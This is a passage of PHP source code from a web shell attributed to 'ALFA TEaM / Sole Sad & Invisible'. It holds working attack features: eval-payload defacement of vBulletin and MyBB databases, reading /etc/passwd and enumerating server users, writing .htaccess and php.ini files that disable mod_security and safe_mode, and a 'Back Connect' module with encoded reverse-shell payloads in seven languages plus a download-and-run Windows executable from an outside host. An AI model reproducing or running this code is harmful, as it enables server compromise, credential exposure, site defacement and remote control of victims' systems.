3806echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$path."/".$fname."'>Click Here !</a></font></b></center><br><br>";
3807}else{
3808echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" ".$path."/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" ".$path."/".$fname." \"</font></b></center><br><br>";
3809}}}}
3810if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')){
3811echo __pre();
3812
3813echo "<center><center><div class='txtfont_header'>| vBulletin |</div>
3814<p><center>".getConfigHtml('vb')."<form onSubmit=\"g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>'); return false;\">
3815";
3816$table = array('td1' =>
3817 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
3818 'td2' =>
3819 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
3820 'td3' =>
3821 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
3822 'td4' =>
3823 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
3824 'td5' =>
3825 array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50')
3826);
3827create_table($table);
3828echo "<br><div class='txtfont'>| Your Index |</div><br>
3829<textarea name='index' rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
3830<input type='submit' value=' '></form></center></center>";
3831if($_POST['alfa8']=='>>'){
3832$s0levisible="Powered By Solevisible";
3833$dbu = $_POST['alfa2'];
3834$dbn = $_POST['alfa3'];
3835$dbp = $_POST['alfa4'];
3836$dbh = $_POST['alfa5'];
3837$index = $_POST['alfa6'];
3838$prefix = $_POST['alfa7'];
3839$index=str_replace("\'","'",$index);
3840$set_index = "{\${eval(base64_decode(\'";
3841$set_index .= __ZW5jb2Rlcg("echo \"$index\";");
3842$set_index .= "\'))}}{\${exit()}}";
3843if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
3844$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
3845$loli1 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'";
3846$loli2 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'";
3847$loli3 = "UPDATE ".$prefix."style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''";
3848@mysqli_query($conn,$loli1) or die (mysqli_error($conn));
3849@mysqli_query($conn,$loli2) or die (mysqli_error($conn));
3850@mysqli_query($conn,$loli3) or die (mysqli_error($conn));
3851__alert('VB index changed...!');
3852}
3853}
3854}
3855if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) {
3856echo __pre();
3857
3858echo "<center><center><div class='txtfont_header'>| Mybb |</div>
3859<p><center>".getConfigHtml('mybb')."<form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\" method=POST action=''>
3860";
3861$table = array('td1' =>
3862 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
3863 'td2' =>
3864 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
3865 'td3' =>
3866 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
3867 'td4' =>
3868 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
3869);
3870create_table($table);
3871echo "<br><div class='txtfont'>| Your Index |</div><br>
3872<textarea name=mybbindex rows='19' cols='103'>
3873<title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type='submit' value='' ></p></form></center></center>";
3874if(isset($_POST['alfa6'])){
3875$mybb_dbh = $_POST['alfa6'];
3876$mybb_dbu = $_POST['alfa7'];
3877$mybb_dbn = $_POST['alfa8'];
3878$mybb_dbp = $_POST['alfa9'];
3879$mybb_index = $_POST['alfa10'];
3880if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){
3881$conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));
3882$prefix="mybb_";
3883$loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
3884$result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));
3885__alert('MyBB index changed...!');
3886}
3887}
3888}
3889echo "</div>";
3890alfafooter();
3891}
3892function alfaproc()
3893{
3894alfahead();
3895echo "<Div class=header><br><center>";
3896if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))
3897$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
3898if($GLOBALS['sys']=="win"){
3899$process=array(
3900"Task List" =>"tasklist /V",
3901"System Info" =>"systeminfo",
3902"Active Connections" => "netstat -an",
3903"Running Services" => "net start",
3904"User Accounts" => "net user",
3905"Show Computers" => "net view",
3906"ARP Table" => "arp -a",
3907"IP Configuration" => "ipconfig /all"
3908);}else{
3909$process=array(
3910"Process status" => "ps aux",
3911"Syslog" =>"cat /etc/syslog.conf",
3912"Resolv" => "cat /etc/resolv.conf",
3913"Hosts" =>"cat /etc/hosts",
3914"Cpuinfo"=>"cat /proc/cpuinfo",
3915"Version"=>"cat /proc/version",
3916"Sbin"=>"ls -al /usr/sbin",
3917"Interrupts"=>"cat /proc/interrupts",
3918"lsattr"=>"lsattr -va",
3919"Uptime"=>"uptime",
3920"Fstab" =>"cat /etc/fstab"
3921);}
3922foreach($process as $n => $link){
3923echo '<a href="javascript:void(0);" onclick="g(\'proc\',null,\''.$link.'\')"> | '.$n.' | </a>';
3924}
3925echo "</center><br>";
3926if(!empty($_POST['alfa1'])){
3927echo "<pre class='ml1' style='margin-top:5px' >";
3928if(isset($GLOBALS["glob_chdir_false"])&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."';";}
3929echo alfaEx($cmd.$_POST['alfa1']);
3930echo '</pre>';
3931}
3932echo "</div>";
3933alfafooter();
3934}
3935function alfasafe(){
3936alfahead();
3937echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
3938echo '<h3><a href=javascript:void(0) onclick="g(\'safe\',null,\'php.ini\',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,\'ini\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,\'pl\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,\'passwd\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,\'users\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,\'valiases\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,null,null,\'domains\')">| Get-Domains | </a></center></h3>';
3939if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains'){
3940if(!_alfa_file_exists("/etc/virtual/domainowners")){
3941echo __pre();
3942$solevisible9 = _alfa_file('/etc/named.conf');
3943if(is_array($solevisible9)){
3944foreach($solevisible9 as $solevisible13){
3945if(@eregi('zone',$solevisible13)){
3946preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
3947if(strlen(trim($solevisible14[1][0])) > 2){
3948echo $solevisible14[1][0].'<br>';
3949}}}
3950}
3951}else{
3952echo __pre();
3953$users = _alfa_file("/etc/virtual/domainowners");
3954if(is_array($users)){
3955foreach($users as $boz){
3956$dom = explode(":",$boz);
3957echo $dom[0]."\n";}}}}
3958if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases'){
3959echo '
3960<form onsubmit="g(\'safe\',null,null,null,null,null,null,\'valiases\',this.site.value,null,\'>>\'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>';
3961if(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){
3962if(!_alfa_file_exists("/etc/virtual/domainowners")){
3963$site = trim($_POST['alfa7']);
3964$rep = str_replace(array("https://","http://","www."),"",$site);
3965$user = "";
3966if(function_exists("posix_getpwuid") && function_exists("fileowner")){
3967 if($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){
3968 $user = $user['name'];
3969 }
3970}else{
3971 if(_alfa_can_runCommand(true,true)){
3972 $user = alfaEx("stat -c '%U' /etc/valiases/".$rep);
3973 }
3974}
3975if(!empty($user)&&$user!='root'){
3976echo __pre()."<center><table border='1'><tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user}</font></b></td></tr><tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
3977}else {echo __pre().'<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';}
3978}else{
3979$site = trim($_POST['alfa7']);
3980$rep = str_replace(array("https://","http://","www."),"",$site);
3981$users = _alfa_file("/etc/virtual/domainowners");
3982foreach($users as $boz){
3983$ex = explode(":",$boz);
3984if($ex[0] == $rep){
3985echo __pre()."<center><table border='1'>
3986<tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">".trim($ex[1])."</font></b></td></tr>
3987<tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";break;}}}}}
3988if(!empty($_POST['alfa5']) && isset($_POST['alfa5'])){
3989if(!_alfa_file_exists("/etc/virtual/domainowners")){
3990echo __pre();
3991$i = 0;
3992while ($i < 60000) {
3993$line = @posix_getpwuid($i);
3994if (!empty($line)) {
3995while (list ($key, $vl) = each($line)){
3996echo $vl."\n";
3997break;}}$i++;}
3998}else{echo __pre();
3999$users = _alfa_file("/etc/virtual/domainowners");
4000foreach($users as $boz){
4001$user = explode(":",$boz);
4002echo trim($user[1]).'<br>';}}}
4003if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){
4004echo __pre();
4005if(_alfa_can_runCommand(true,true)){echo __read_file("/etc/passwd");}elseif(function_exists("posix_getpwuid")){
4006for($uid=0;$uid<60000;$uid++){
4007$ara = @posix_getpwuid($uid);
4008if(!empty($ara)){
4009while(list ($key, $val) = each($ara)){
4010echo "$val:";
4011}echo "\n";}}
4012}else{__alert('failed...');}}
4013if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){
4014@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>");
4015echo '<center><b><big>htaccess for Apache created...!</center></b></big>';
4016}
4017if(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){
4018@__write_file($GLOBALS['cwd']."php.ini","safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");
4019echo '<center><b><big> php.ini created...!</center></b></big>';
4020}
4021if(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){
4022@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
4023echo '<center><b><big>htaccess for Litespeed created...!</center></b></big>';
4024}
4025echo "<br></div>";
4026alfafooter();
4027}
4028function __get_resource($content){
4029return @gzinflate(__ZGVjb2Rlcg($content));
4030}
4031function __write_file($file, $content){
4032if($fh = @fopen($file, "wb")){
4033if(fwrite($fh, $content)!==false) return true;
4034}
4035return false;
4036}
4037function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){
4038$res = "<font color='green'>[ Success...! ]</font>";
4039$err = "<font color='red'>[ Failed...! ]</font>";
4040if($evalOptions!="") $evalOptions = $evalOptions." ";
4041if($evalArguments!="") $evalArguments = " ".$evalArguments;
4042if($evalType=="c"){
4043$tmpdir = ALFA_TEMPDIR;
4044chdir($tmpdir);
4045if(is_writable($tmpdir)){
4046$uniq = substr(md5(time()),0,8);
4047$filename = $evalType.$uniq.".c";
4048$path = $filename;
4049if(__write_file($path, $evalCode)){
4050$ext = ($GLOBALS['sys']=='win')? ".exe":".out";
4051$pathres = $filename.$ext;
4052$evalOptions = "-o ".$pathres." ".$evalOptions;
4053$cmd = "gcc ".$evalOptions.$path;
4054alfaEx($cmd);
4055if(is_file($pathres)){
4056if(chmod($pathres, 0755)){
4057$cmd = $pathres.$evalArguments;
4058alfaEx($cmd);
4059}else{$res = $err;}
4060unlink($pathres);
4061}else{$res = $err;}
4062unlink($path);
4063}else{$res = $err;}
4064}
4065return $res;
4066}elseif($evalType=="java"){
4067$tmpdir = ALFA_TEMPDIR;
4068chdir($tmpdir);
4069if(is_writable($tmpdir)){
4070if(preg_match("/class\ ([^{]+){/i",$evalCode, $r)){
4071$classname = trim($r[1]);
4072$filename = $classname;
4073}else{
4074$uniq = substr(md5(time()),0,8);
4075$filename = $evalType.$uniq;
4076$evalCode = "class ".$filename." { ".$evalCode . " } ";
4077}
4078$path = $filename.".java";
4079if(__write_file($path, $evalCode)){
4080$cmd = "javac ".$evalOptions.$path;
4081alfaEx($cmd);
4082$pathres = $filename.".class";
4083if(is_file($pathres)){
4084if(chmod($pathres, 0755)){
4085$cmd = "java ".$filename.$evalArguments;
4086alfaEx($cmd);
4087}else{$res = $err;}
4088unlink($pathres);
4089}else{$res = $err;}
4090unlink($path);
4091}else{$res = $err;}
4092}
4093return $res;
4094}
4095return false;
4096}
4097function alfaconnect(){
4098alfahead();
4099$php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
4100$python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
4101$perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
4102$ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
4103$node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
4104$c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
4105$java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
4106echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
4107echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\">
4108<div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
4109$cbArr = array("php"=>"Php","perl"=>"Perl","python"=>"Python","ruby"=>"Ruby","c"=>"C","java"=>"Java","node"=>"NodeJs","bcwin"=>"Windows");
4110foreach($cbArr as $key=>$val){echo("<option value='{$key}' ".($GLOBALS['sys']=='win'?'selected':'').">{$val}</option>");}
4111echo "</select> <div id='bcipAction' style='display:inline-block;'><div class=\"txtfont\">IP:</div> <input type='text' style='text-align:center;' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
4112if(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){
4113$lang = $_POST['alfa1'];
4114$ip = $_POST['alfa2'];
4115$port = $_POST['alfa3'];
4116$arg = ($_POST['alfa4']=='bind'?$port:$port.' '.$ip);
4117$tmpdir = ALFA_TEMPDIR;
4118$name = $tmpdir.'/'.$lang.uniqid().rand(1,99999);
4119$allow = array('perl','ruby','python','node');
4120eval('$lan=$'.$lang.';');
4121if(in_array($lang,$allow)){
4122if(__write_file($name,__get_resource($lan))){
4123if(_alfa_can_runCommand(true,true)){
4124$os = ($GLOBALS['sys']!='win')?'1>/dev/null 2>&1 &':'';
4125$out = alfaEx("$lang $name $arg $os");
4126if($out==''){$out="<font color='green'><center>[ Finished...! ]</center></font>";}
4127echo("<pre class='ml1' style='margin-top:5px'>{$out}</pre>");
4128}
4129}else{
4130echo("<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>");
4131}
4132}
4133if($lang=='java'||$lang=='c'){
4134$code = __get_resource($lan);
4135$out = nl2br(bcinit($lang, $code,'',''));
4136echo("<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>");
4137}
4138if($lang=='bcwin'){
4139$alfa = new AlfaCURL();
4140$s = $alfa->Send('http://solevisible.com/bc/windows.exe');
4141$tmpdir = ALFA_TEMPDIR;
4142$f = @fopen($tmpdir.'/bcwin.exe','w+');
4143@fwrite($f, $s);
4144@fclose($f);
4145$out = alfaEx($tmpdir."/bcwin.exe ".$_POST['alfa2']." ".$_POST['alfa3']);
4146}
4147if($lang=='php'){
4148echo "<pre class=ml1 style='margin-top:5px'>";
4149$code = __get_resource($lan);
4150if($code!==false){
4151$code = "\$target = \"".$arg."\";\n".$code;
4152eval($code);
4153echo("<center><font color='green'>[ Finished...! ]</font></center>");
4154}
4155echo "</pre>";
4156}
4157}
4158echo "</div>";
4159alfafooter();
4160}
4161function alfazoneh(){
4162alfahead();
4163echo '<div class=header>';
4164if(!function_exists('curl_version')){
4165echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";
4166}
